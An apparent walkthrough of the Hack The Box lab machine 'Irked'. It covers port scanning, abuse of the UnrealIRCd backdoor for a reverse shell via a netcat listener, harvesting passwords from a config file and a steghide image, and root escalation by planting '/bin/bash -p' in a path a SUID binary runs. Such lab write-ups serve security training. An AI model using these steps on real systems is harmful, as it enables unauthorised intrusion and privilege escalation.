Hack The Box : Irked
15 August, 2021
Let's begin with the nmap scan.
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  3,4        111/tcp6    rpcbind
|   100000  3,4        111/udp6    rpcbind
|   100024  1          34297/udp6  status
|   100024  1          47073/tcp   status
|   100024  1          52467/tcp6  status
|_  100024  1          60014/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The website wasn't anything complicated.
$ curl 10.10.10.117
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
I checked the common ports associated with IRC.
$ nmap -p 194,6667,6660-7000 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:07 EDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Not shown: 341 closed ports
PORT     STATE SERVICE
6697/tcp open  ircs-u
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
$ nmap -A -p 6697 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:09 EDT
Nmap scan report for 10.10.10.117
Host is up (0.21s latency).
PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.38 seconds
Connecting to the port using nc:
$ nc -vn 10.10.10.117 6697
(UNKNOWN) [10.10.10.117] 6697 (ircs-u) open
:irked.htb NOTICE AUTH :*** Looking up your hostname...
INFO
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irked.htb 451 INFO :You have not registered
HOST
:irked.htb 451 HOST :You have not registered
INFO
:irked.htb 451 INFO :You have not registered
VERSION
:irked.htb 005 UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irked.htb 005 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irked.htb 005 EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
ADMIN
:irked.htb 256 :Administrative info about irked.htb
:irked.htb 257 :Bob Smith
:irked.htb 258 :bob
:irked.htb 258 :widely@used.name
Looks like bob might be a username.
I ran another nmap scan, this time with some IRC-specific scripts.
$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:12 EDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.40s latency).
PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
| irc-botnet-channels:
|_  ERROR: Closing Link: [10.10.16.174] (Too many unknown connections from your IP)
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irked.htb
|   version: Unreal3.2.8.1. irked.htb
|   uptime: 0 days, 0:22:00
|   source ident: nmap
|   source host: D7DF0A82.E1443270.9F3BFBDD.IP
|_  error: Closing Link: jdnjqnzam[10.10.16.174] (Quit: jdnjqnzam)
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
Looking into the irc-unrealircd-backdoor result, I found that version 3.2.8.1 of UnrealIRCd had a malicious backdoor: https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/. I found Python code for the exploit as well. Let's try it out.
$ nc -lvnp 4242
listening on [any] 4242 ...
id
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.117] 58403
ircd@irked:~/Unreal3.2$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd
It worked! I have a low-privilege shell.
User
I ran linpeas but didn't find anything significant.
Next I checked the config file /home/ircd/Unreal3.2/unrealircd.conf and found two passwords:
/* Passworded allow line */
allow {
    ip *@255.255.255.255;
    hostname *@*.passworded.ugly.people;
    class clients;
    password "f00Ness";
    maxperip 1;
};

oper bobsmith {
    class clients;
    from {
        userhost bob@smithco.com;
    };
    password "f00";
    flags
    {
        netadmin;
        can_zline;
        can_gzline;
        can_gkline;
        global;
    };
};
I tried to enumerate IRC information using the above credentials, but nothing worked.
I looked around more and found a file in djmardov's Documents directory.
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
At first I started exploring text-based steganography, but then I realised there was an image on the homepage, irked.jpg.
I learnt about a tool called steghide.
$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt"
I had used the password found in .backup.
$ cat pass.txt
Kab6h+m+bbp2J:HG
Using this as the password, I switched to djmardov and got the user flag.
ircd@irked:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:~/Documents$ whoami
whoami
djmardov
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
<flag>
Root
I ran linpeas again, and this SUID file was italicised and bold in the output:
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-08-15 08:41 (:0)
djmardov pts/1 2021-08-15 09:06 (10.10.16.174)
djmardov pts/2 2021-08-15 09:07 (10.10.16.174)
sh: 1: /tmp/listusers: not found
It was trying to execute some file /tmp/listusers as root but couldn't find it. Let me help this program and create the file...
djmardov@irked:~$ echo "/bin/bash -p" > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-08-15 08:41 (:0)
djmardov pts/1 2021-08-15 09:06 (10.10.16.174)
djmardov pts/2 2021-08-15 09:07 (10.10.16.174)
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# whoami
root
root@irked:~# cd /root
root@irked:/root# ls
pass.txt root.txt
root@irked:/root# cat root.txt
<flag>
root@irked:/root# cat pass.txt
Kab6h+m+bbp2J:HG